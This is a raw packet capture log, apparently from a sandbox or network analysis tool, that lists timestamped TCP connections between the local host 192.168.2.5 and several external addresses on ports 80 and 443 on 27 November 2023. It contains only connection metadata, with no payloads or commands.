                                                          Nov 27, 2023 04:23:42.775424004 CET49716443192.168.2.5142.251.163.105
                                                          Nov 27, 2023 04:23:42.776618958 CET49716443192.168.2.5142.251.163.105
                                                          Nov 27, 2023 04:23:42.776631117 CET44349716142.251.163.105192.168.2.5
                                                          Nov 27, 2023 04:23:42.938262939 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:43.034171104 CET4971880192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:43.062489986 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:43.062597036 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:43.062812090 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:43.157896996 CET8049718104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:43.158005953 CET4971880192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:43.186861992 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:43.608185053 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:43.608217001 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:43.608232975 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:43.608325005 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:43.660593033 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:44.068578005 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:44.153635025 CET49719443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:23:44.153659105 CET44349719172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:23:44.153713942 CET49719443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:23:44.154833078 CET49719443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:23:44.154844999 CET44349719172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:23:44.192820072 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202110052 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202125072 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202137947 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202179909 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202179909 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:44.202193975 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202208042 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202223063 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202234983 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202240944 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:44.202249050 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202260971 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202265024 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:44.202290058 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:44.202300072 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:44.202914000 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202925920 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.202969074 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:44.277457952 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:44.347223997 CET44349719172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:23:44.382679939 CET49719443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:23:44.382711887 CET44349719172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:23:44.383796930 CET44349719172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:23:44.383893967 CET49719443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:23:44.388787985 CET49719443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:23:44.388860941 CET44349719172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:23:44.409430027 CET8049717104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:44.438492060 CET49719443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:23:44.438500881 CET44349719172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:23:44.453757048 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:44.484097004 CET49719443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:23:45.040426970 CET49720443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.040469885 CET443497202.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:45.040549994 CET49720443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.042952061 CET49720443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.042967081 CET443497202.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:45.397456884 CET443497202.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:45.397558928 CET49720443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.400934935 CET49720443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.400943041 CET443497202.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:45.401165009 CET443497202.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:45.453190088 CET49720443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.456806898 CET49721443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.456836939 CET44349721104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.456904888 CET49721443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.457891941 CET49722443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.457931042 CET44349722104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.457984924 CET49722443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.458396912 CET49721443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.458410025 CET44349721104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.458960056 CET49722443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.458973885 CET44349722104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.575886011 CET49720443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.617264986 CET443497202.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:45.717854023 CET44349721104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.720474005 CET44349722104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.741017103 CET49722443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.741028070 CET44349722104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.741542101 CET49721443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.741556883 CET44349721104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.742192984 CET44349722104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.742192984 CET49723443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.742238045 CET44349723104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.742273092 CET49722443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.742317915 CET49723443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.742578030 CET44349721104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.742633104 CET49721443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.748053074 CET49723443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.748068094 CET44349723104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.748269081 CET49721443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.748353958 CET44349721104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.748450041 CET49721443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.748457909 CET44349721104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.748620987 CET49722443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.748694897 CET44349722104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.749388933 CET443497202.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:45.749696016 CET443497202.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:45.749751091 CET49720443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.750255108 CET49720443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.750266075 CET443497202.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:45.750277042 CET49720443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.750283957 CET443497202.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:45.788223028 CET49724443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.788234949 CET443497242.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:45.788304090 CET49724443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.788850069 CET49724443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:45.788861036 CET443497242.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:45.795262098 CET49722443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.795269012 CET44349722104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:45.795305967 CET49721443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:45.843594074 CET49722443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:46.004515886 CET44349723104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:46.009637117 CET49723443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:46.009675026 CET44349723104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:46.010545969 CET44349723104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:46.010612965 CET49723443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:46.019526005 CET49723443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:46.019609928 CET44349723104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:46.019728899 CET49723443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:46.019737959 CET44349723104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:46.062223911 CET49723443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:46.139203072 CET443497242.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:46.139389992 CET49724443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:46.140393019 CET49675443192.168.2.523.1.237.91
                                                          Nov 27, 2023 04:23:46.140392065 CET49674443192.168.2.523.1.237.91
                                                          Nov 27, 2023 04:23:46.140789986 CET49724443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:46.140799999 CET443497242.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:46.141036034 CET443497242.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:46.143445969 CET49724443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:46.185264111 CET443497242.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:46.231834888 CET49673443192.168.2.523.1.237.91
                                                          Nov 27, 2023 04:23:46.305027008 CET44349723104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:46.305109978 CET44349723104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:46.305350065 CET49723443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:46.305973053 CET49723443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:46.305993080 CET44349723104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:46.489526987 CET443497242.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:46.489619970 CET443497242.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:46.489773035 CET49724443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:46.491297007 CET49724443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:46.491319895 CET443497242.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:46.491336107 CET49724443192.168.2.52.22.76.127
                                                          Nov 27, 2023 04:23:46.491342068 CET443497242.22.76.127192.168.2.5
                                                          Nov 27, 2023 04:23:46.968069077 CET44349721104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:46.968132019 CET44349721104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:46.968214035 CET44349721104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:46.968276978 CET44349721104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:46.968280077 CET49721443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:46.968280077 CET49721443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:46.968322992 CET49721443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:46.977389097 CET49721443192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:23:46.977406979 CET44349721104.21.78.140192.168.2.5
                                                          Nov 27, 2023 04:23:47.110620022 CET49725443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:47.110657930 CET44349725104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:47.110730886 CET49725443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:47.111289978 CET49725443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:47.111305952 CET44349725104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:47.373086929 CET44349725104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:47.373327971 CET49725443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:47.373346090 CET44349725104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:47.374372005 CET44349725104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:47.374432087 CET49725443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:47.377253056 CET49725443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:47.377315998 CET44349725104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:47.377552986 CET49725443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:47.377559900 CET44349725104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:47.423178911 CET49725443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:47.670150995 CET4434970323.1.237.91192.168.2.5
                                                          Nov 27, 2023 04:23:47.670262098 CET49703443192.168.2.523.1.237.91
                                                          Nov 27, 2023 04:23:48.109848976 CET44349725104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.109978914 CET44349725104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.110039949 CET49725443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.156842947 CET49725443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.156857967 CET44349725104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.168715000 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.168751955 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.168834925 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.169291019 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.169306040 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.179789066 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.179816008 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.179883003 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.180208921 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.180222034 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.426865101 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.427189112 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.427203894 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.427573919 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.427898884 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.427963018 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.428102970 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.428133965 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.434978962 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.435229063 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.435242891 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.435600996 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.435894966 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:48.435956955 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:48.487250090 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.113586903 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.113637924 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.113672018 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.113751888 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.114048958 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.114078045 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.114094019 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.114176989 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.117321968 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117388964 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117412090 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117417097 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.117439032 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117463112 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117484093 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117489100 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.117501974 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117525101 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117526054 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.117547989 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.117553949 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117578030 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117598057 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.117598057 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117613077 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117646933 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.117654085 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.117691040 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.163983107 CET49728443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.164071083 CET44349728104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.164187908 CET49728443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.164691925 CET49729443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.164735079 CET44349729104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.164794922 CET49729443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.165002108 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.165344000 CET49728443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.165360928 CET44349728104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.165627003 CET49729443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.165636063 CET44349729104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.173309088 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.221415043 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.221472025 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.221492052 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.221765041 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.221765041 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.221790075 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.221837044 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.237754107 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.238046885 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.245387077 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.245531082 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.245661020 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.245661020 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.245912075 CET49726443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.245935917 CET44349726104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.308120966 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.308172941 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.308193922 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.308216095 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.308234930 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.308254957 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.308274031 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.308289051 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.308471918 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.308471918 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.308501005 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310538054 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310563087 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310581923 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310602903 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310616016 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.310621977 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310633898 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310663939 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310678959 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.310688019 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310704947 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.310729980 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310748100 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310766935 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310770035 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.310775995 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310811996 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.310817957 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.310862064 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.313442945 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313493013 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313514948 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313539982 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.313541889 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313556910 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313587904 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313591957 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.313602924 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313623905 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313631058 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.313654900 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313671112 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.313676119 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313685894 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313714981 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.313724995 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313745975 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313770056 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.313776016 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.313829899 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.314865112 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.314903021 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.314938068 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.314949989 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.314960003 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.314982891 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.314996004 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.315002918 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.315023899 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.315045118 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.315052986 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.315077066 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.361469984 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.431498051 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.431587934 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.431641102 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.431691885 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.431709051 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.431761980 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.433753967 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.433875084 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.434380054 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.434416056 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.434447050 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.434462070 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.434479952 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.434505939 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.434953928 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.435013056 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.435849905 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.435920000 CET49727443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:23:49.437107086 CET44349727104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:23:49.437158108 CET44349727104.21.1.7192.168.2.5
